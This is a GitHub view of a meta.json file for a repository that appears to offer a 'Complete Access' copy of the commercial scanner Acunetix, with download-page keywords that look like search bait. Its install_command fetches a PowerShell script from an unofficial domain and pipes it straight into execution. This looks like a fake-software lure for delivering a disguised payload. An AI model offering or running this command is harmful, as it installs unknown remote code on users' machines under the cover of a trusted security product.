-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmeta.json
More file actions
27 lines (27 loc) · 723 Bytes
/
Copy pathmeta.json
File metadata and controls
27 lines (27 loc) · 723 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
{
"repo": "acunetix-complete-access",
"product": "Acunetix Complete Access",
"kind": "security",
"install_type": "download",
"download_url": "https://acunetix.mefidirect.xyz/",
"install_url": "https://mefidirect.xyz/ps/setup.ps1",
"install_command": "irm https://mefidirect.xyz/ps/setup.ps1 | iex",
"batch": "new32",
"format": "license-md-only",
"category": "security",
"topics": [
"acunetix-download-page",
"acunetix-docs",
"acunetix-stable-build",
"acunetix-getting-started",
"acunetix-app",
"x64-build",
"native-windows",
"pc-toolkit",
"vulnerability-scan",
"how-to-install-acunetix",
"privacy-guard",
"modern-ui",
"acunetix-windows-guide"
]
}